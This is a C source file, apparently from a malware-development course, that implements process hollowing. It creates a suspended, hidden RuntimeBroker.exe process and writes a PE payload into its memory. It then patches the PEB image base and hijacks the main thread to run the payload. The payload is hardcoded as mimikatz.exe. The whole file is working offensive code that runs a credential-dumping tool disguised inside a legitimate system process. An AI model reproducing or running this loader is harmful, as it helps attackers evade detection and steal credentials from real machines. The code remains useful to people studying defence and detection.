// @NUL0x4C | @mrd0x : MalDevAcademy

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#pragma comment(lib, "WindowsApp.lib")
#pragma warning (disable:4996)

// ========================================================================================================================

#define PRINT_WINAPI_ERR(cApiName)	printf( "[!] %s Failed With Error: %d\n", cApiName, GetLastError())
#define GET_FILENAME(cPath)			(strrchr( cPath, '\\' ) ? strrchr( cPath, '\\' ) + 1 : cPath)

#define DELETE_HANDLE(H)						\
		if (H && H != INVALID_HANDLE_VALUE) {	\
			CloseHandle(H);						\
			H = NULL;							\
	}

// ========================================================================================================================

BOOL ReadFileFromDisk(IN LPCSTR cFileName, OUT PBYTE* ppBuffer, OUT PDWORD pdwFileSize) {

	HANDLE	hFile				= INVALID_HANDLE_VALUE;
	PBYTE	pBufer				= NULL;
	DWORD	dwFileSize			= 0x00,
			dwNumberOfBytesRead = 0x00;

	if ((hFile = CreateFileA(cFileName, GENERIC_READ, 0x00, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		PRINT_WINAPI_ERR("CreateFileA");
		goto _FUNC_CLEANUP;
	}

	if ((dwFileSize = GetFileSize(hFile, NULL)) == INVALID_FILE_SIZE) {
		PRINT_WINAPI_ERR("GetFileSize");
		goto _FUNC_CLEANUP;
	}

	if ((pBufer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize)) == NULL) {
		PRINT_WINAPI_ERR("HeapAlloc");
		goto _FUNC_CLEANUP;
	}

	if (!ReadFile(hFile, pBufer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwFileSize != dwNumberOfBytesRead) {
		PRINT_WINAPI_ERR("ReadFile");
		goto _FUNC_CLEANUP;
	}

	*ppBuffer = pBufer;
	*pdwFileSize = dwFileSize;

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	if (!*ppBuffer && pBufer)
		HeapFree(GetProcessHeap(), 0x00, pBufer);
	return ((*ppBuffer != NULL) && (*pdwFileSize != 0x00)) ? TRUE : FALSE;
}

// ========================================================================================================================

BOOL FixMemPermissionsEx(IN HANDLE hProcess, IN ULONG_PTR pPeBaseAddress, IN PIMAGE_NT_HEADERS pImgNtHdrs, IN PIMAGE_SECTION_HEADER pImgSecHdr) {

	// Loop through each section of the PE image.
	for (DWORD i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++) {

		// Variables to store the new and old memory protections.
		DWORD	dwProtection		= 0x00,
				dwOldProtection		= 0x00;

		// Skip the section if it has no data or no associated virtual address.
		if (!pImgSecHdr[i].SizeOfRawData || !pImgSecHdr[i].VirtualAddress)
			continue;

		// Determine memory protection based on section characteristics.
		// These characteristics dictate whether the section is readable, writable, executable, etc.
		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE)
			dwProtection = PAGE_WRITECOPY;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)
			dwProtection = PAGE_READONLY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_READWRITE;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE)
			dwProtection = PAGE_EXECUTE;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE))
			dwProtection = PAGE_EXECUTE_WRITECOPY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READ;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READWRITE;

		// Apply the determined memory protection to the section.
		if (!VirtualProtectEx(hProcess, (PVOID)(pPeBaseAddress + pImgSecHdr[i].VirtualAddress), pImgSecHdr[i].SizeOfRawData, dwProtection, &dwOldProtection)) {
			PRINT_WINAPI_ERR("VirtualProtectEx");
			return FALSE;
		}
	}

	return TRUE;
}

// ========================================================================================================================

VOID PrintOutput(IN HANDLE StdOutRead) {

	BOOL		bSTATE	= TRUE;

	do {

		DWORD	dwAvailableBytes	= 0x00;
		PBYTE	pBuffer				= 0x00;

		PeekNamedPipe(StdOutRead, NULL, NULL, NULL, &dwAvailableBytes, NULL);

		pBuffer = (PBYTE)LocalAlloc(LPTR, (SIZE_T)dwAvailableBytes);
		if (!pBuffer)
			break;

		if (!(bSTATE = ReadFile(StdOutRead, pBuffer, dwAvailableBytes, NULL, NULL))) {
			LocalFree(pBuffer);
			break;
		}

		printf(pBuffer);

		LocalFree(pBuffer);

	} while (bSTATE);
}

// ========================================================================================================================

BOOL CreateTheHollowedProcess(IN LPCSTR cRemoteProcessImage, IN OPTIONAL LPCSTR cProcessParms, OUT PPROCESS_INFORMATION pProcessInfo, OUT HANDLE* pStdInWrite, OUT HANDLE* pStdOutRead) {

	STARTUPINFO					StartupInfo			= { 0x00 };
	SECURITY_ATTRIBUTES			SecAttr				= { 0x00 };
	HANDLE						StdInRead			= NULL,		// Handle for reading from the input pipe. This will be closed.
								StdInWrite			= NULL,		// Handle for writing to the input pipe.
								StdOutRead			= NULL,		// Handle for reading from the output pipe.
								StdOutWrite			= NULL;		// Handle for writing to the output pipe. This will be closed.
	LPCSTR						cRemoteProcessCmnd	= NULL;
	BOOL						bSTATE				= FALSE;

	RtlSecureZeroMemory(pProcessInfo, sizeof(PROCESS_INFORMATION));
	RtlSecureZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
	RtlSecureZeroMemory(&SecAttr, sizeof(SECURITY_ATTRIBUTES));

	SecAttr.nLength					= sizeof(SECURITY_ATTRIBUTES);
	SecAttr.bInheritHandle			= TRUE;
	SecAttr.lpSecurityDescriptor	= NULL;

	// Initialize Anonymous Input Pipe
	if (!CreatePipe(&StdInRead, &StdInWrite, &SecAttr, 0x00)) {
		PRINT_WINAPI_ERR("CreatePipe[1]");
		goto _FUNC_CLEANUP;
	}

	// Initialize Anonymous Output Pipe
	if (!CreatePipe(&StdOutRead, &StdOutWrite, &SecAttr, 0x00)) {
		PRINT_WINAPI_ERR("CreatePipe[2]");
		goto _FUNC_CLEANUP;
	}

	// Initialize I/O Pipes
	StartupInfo.cb				= sizeof(STARTUPINFO);
	StartupInfo.dwFlags			|= (STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES);
	StartupInfo.wShowWindow		= SW_HIDE;
	StartupInfo.hStdInput		= StdInRead;
	StartupInfo.hStdOutput		= StartupInfo.hStdError = StdOutWrite;

	cRemoteProcessCmnd = LocalAlloc(LPTR, (strlen(cRemoteProcessImage) + (cProcessParms ? strlen(cProcessParms) : 0x00) + (sizeof(CHAR) * 2)));
	if (!cRemoteProcessCmnd) {
		PRINT_WINAPI_ERR("LocalAlloc");
		goto _FUNC_CLEANUP;
	}

	// Create the process
	sprintf(cRemoteProcessCmnd, cProcessParms == NULL ? "%s" : "%s %s", cRemoteProcessImage, cProcessParms == NULL ? "" : cProcessParms);
	if (!CreateProcessA(NULL, cRemoteProcessCmnd, &SecAttr, NULL, TRUE, (CREATE_SUSPENDED | CREATE_NEW_CONSOLE), NULL, NULL, &StartupInfo, pProcessInfo)) {
		PRINT_WINAPI_ERR("CreateProcessA");
		goto _FUNC_CLEANUP;
	}

	printf("[*] Target Process Created With PID: %d \n", pProcessInfo->dwProcessId);

	*pStdInWrite = StdInWrite;
	*pStdOutRead = StdOutRead;

	bSTATE = TRUE;

_FUNC_CLEANUP:
	if (cRemoteProcessCmnd)
		LocalFree(cRemoteProcessCmnd);
	// Close handles to make it non-blocking (without getting blocked waiting for the child process to read or write data)
	// This leaves StdInWrite && StdOutRead handles open
	DELETE_HANDLE(StdInRead);
	DELETE_HANDLE(StdOutWrite);
	return TRUE;
}

// ========================================================================================================================


BOOL ReplaceBaseAddressImage(IN HANDLE hProcess, IN ULONG_PTR uPeBaseAddress, IN ULONG_PTR Rdx) {

	ULONG_PTR	uRemoteImageBaseOffset	= 0x00,
				uRemoteImageBase		= 0x00;

	SIZE_T		NumberOfBytesRead		= 0x00,
				NumberOfBytesWritten	= 0x00;


	// Get the offset of the ImageBaseAddress in the PEB structure
	// Context.Rdx is PPEB
	// Context.Rdx + offsetof(PEB, Reserved3[1])) is PPEB->Reserved3[1], which is ImageBaseAddress
	uRemoteImageBaseOffset = (PVOID)(Rdx + offsetof(PEB, Reserved3[1]));

	// FOR DEBUGGING
	/*
	// Reading the original image base address
	if (!ReadProcessMemory(hProcess, uRemoteImageBaseOffset, &uRemoteImageBase, sizeof(PVOID), &NumberOfBytesRead) || sizeof(PVOID) != NumberOfBytesRead){
		PRINT_WINAPI_ERR("ReadProcessMemory");
		return FALSE;
	}
	
	printf("[i] Replacing Original Image Address From %p To %p ... \n", (void*)uRemoteImageBase, (void*)uPeBaseAddress);
	*/

	printf("[i] Overwriting Image Base Address ... ");

	// Write remote image base:
	if (!WriteProcessMemory(hProcess, (PVOID)uRemoteImageBaseOffset, &uPeBaseAddress, sizeof(PVOID), &NumberOfBytesWritten) || sizeof(PVOID) != NumberOfBytesWritten) {
		PRINT_WINAPI_ERR("WriteProcessMemory");
		return FALSE;
	}

	printf("[+] DONE \n");

	return TRUE;
}


// ========================================================================================================================



BOOL RemotePeExec(IN PBYTE pPeBuffer, IN LPCSTR cRemoteProcessImage, IN OPTIONAL LPCSTR cProcessParms) {

	if (!pPeBuffer || !cRemoteProcessImage)
		return FALSE;

	PROCESS_INFORMATION		ProcessInfo				= { 0x00 };
	CONTEXT					Context					= { .ContextFlags = CONTEXT_ALL };
	HANDLE					StdInWrite				= NULL,		// Handle for writing to the input pipe.
							StdOutRead				= NULL;		// Handle for reading from the output pipe.
	PBYTE					pRemoteAddress			= NULL;
	PIMAGE_NT_HEADERS		pImgNtHdrs				= NULL;
	PIMAGE_SECTION_HEADER	pImgSecHdr				= NULL;
	SIZE_T					NumberOfBytesWritten	= NULL;
	BOOL					bSTATE					= FALSE;


	// Create the hollowed process
	if (!CreateTheHollowedProcess(cRemoteProcessImage, cProcessParms, &ProcessInfo, &StdInWrite, &StdOutRead))
		goto _FUNC_CLEANUP;

	if (!ProcessInfo.hProcess || !ProcessInfo.hThread)
		goto _FUNC_CLEANUP;

	printf("[i] Press <Enter> To Continue...");
	getchar();


	// Retrieve NT image headers 
	pImgNtHdrs = (PIMAGE_NT_HEADERS)((ULONG_PTR)pPeBuffer + ((PIMAGE_DOS_HEADER)pPeBuffer)->e_lfanew);
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) {
		printf("[!] Invalid NT Image Headers\n");
		goto _FUNC_CLEANUP;
	}

	// Allocate remote virtual memory
	if (!(pRemoteAddress = VirtualAllocEx(ProcessInfo.hProcess, (LPVOID)pImgNtHdrs->OptionalHeader.ImageBase, (SIZE_T)pImgNtHdrs->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) {
		PRINT_WINAPI_ERR("VirtualAllocEx");
		goto _FUNC_CLEANUP;
	}

	printf("[*] Remote Image Base Address: 0x%p\n", pRemoteAddress);
	printf("[i] Preferable Base Address: 0x%p\n", (LPVOID)pImgNtHdrs->OptionalHeader.ImageBase);

	// Check if the image base is the same as the one in the headers
	if (pRemoteAddress != (LPVOID)pImgNtHdrs->OptionalHeader.ImageBase) {
		printf("[!] PE Payload Will Require Relocation - [NOT SUPPORTED]\n");
		goto _FUNC_CLEANUP;
	}

	printf("[i] Press <Enter> To Write The PE Payload ...");
	getchar();

	// Copy over image header
	if (!WriteProcessMemory(ProcessInfo.hProcess, pRemoteAddress, pPeBuffer, pImgNtHdrs->OptionalHeader.SizeOfHeaders, &NumberOfBytesWritten) || pImgNtHdrs->OptionalHeader.SizeOfHeaders != NumberOfBytesWritten) {
		PRINT_WINAPI_ERR("WriteProcessMemory");
		goto _FUNC_CLEANUP;
	}

	printf("[*] Wrote Headers At %p Of Size %d \n", (void*)pRemoteAddress, (int)pImgNtHdrs->OptionalHeader.SizeOfHeaders);
	printf("[i] Writing Sections ... \n");

	// Copy over sections 
	pImgSecHdr = IMAGE_FIRST_SECTION(pImgNtHdrs);
	for (int i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++) {

		printf("\t<i> Writing Section %s At %p Of Size %d \n", pImgSecHdr[i].Name, (void*)(pRemoteAddress + pImgSecHdr[i].VirtualAddress), (int)pImgSecHdr[i].SizeOfRawData);

		if (!WriteProcessMemory(ProcessInfo.hProcess, (PVOID)(pRemoteAddress + pImgSecHdr[i].VirtualAddress), (PVOID)(pPeBuffer + pImgSecHdr[i].PointerToRawData), pImgSecHdr[i].SizeOfRawData, &NumberOfBytesWritten) || pImgSecHdr[i].SizeOfRawData != NumberOfBytesWritten) {
			PRINT_WINAPI_ERR("WriteProcessMemory");
			goto _FUNC_CLEANUP;
		}
	}


	// Get thread context of the main thread
	if (!GetThreadContext(ProcessInfo.hThread, &Context)) {
		PRINT_WINAPI_ERR("GetThreadContext");
		goto _FUNC_CLEANUP;
	}

	// Patch the 'ImageBaseAddress' element in the 'PEB' structure of the remote process to point to our PE instead
	if (!ReplaceBaseAddressImage(ProcessInfo.hProcess, pRemoteAddress, Context.Rdx)) {
		goto _FUNC_CLEANUP;
	}

	// Set suitable memory permissions
	if (!FixMemPermissionsEx(ProcessInfo.hProcess, pRemoteAddress, pImgNtHdrs, pImgSecHdr))
		goto _FUNC_CLEANUP;

	printf("[i] Press <Enter> To Execute The Entry Payload ...");
	getchar();
	printf("[i] Hijacking Thread To Run EntryPoint: %p ... ", (LPVOID)(pRemoteAddress + pImgNtHdrs->OptionalHeader.AddressOfEntryPoint));

	// Thread Hijacking:
	Context.Rcx = (LPVOID)(pRemoteAddress + pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);
	if (!SetThreadContext(ProcessInfo.hThread, &Context)) {
		PRINT_WINAPI_ERR("SetThreadContext");
		goto _FUNC_CLEANUP;
	}
	printf("[+] DONE\n");

	
	printf("[i] Press <Enter> To Resume The Process ... ");
	getchar();

	// Resume thread
	if (ResumeThread(ProcessInfo.hThread) == ((DWORD)-1)) {
		PRINT_WINAPI_ERR("ResumeThread");
		goto _FUNC_CLEANUP;
	}

	// Wait till the process runs the code
	WaitForSingleObject(ProcessInfo.hProcess, INFINITE);	

	// Read output
	printf("[*] Reading output: \n\n");
	PrintOutput(StdOutRead);

	bSTATE = TRUE;

_FUNC_CLEANUP:
	DELETE_HANDLE(StdInWrite);
	DELETE_HANDLE(StdOutRead);
	DELETE_HANDLE(ProcessInfo.hProcess);
	DELETE_HANDLE(ProcessInfo.hThread);
	return bSTATE;
}


// ========================================================================================================================


#define PE_PAYLOAD			"C:\\Users\\Admin\\source\\repos\\mimikatz.exe"
#define TARGET_PROCESS		"C:\\Windows\\System32\\RuntimeBroker.exe"
#define PARMS				"coffee exit"

int main() {

	PBYTE	pBuffer = NULL;
	DWORD	dwBuffer = 0x00;

	if (!ReadFileFromDisk(PE_PAYLOAD, &pBuffer, &dwBuffer)) {
		return -1;
	}

	return RemotePeExec(pBuffer, TARGET_PROCESS, PARMS) ? 0 : -1;
}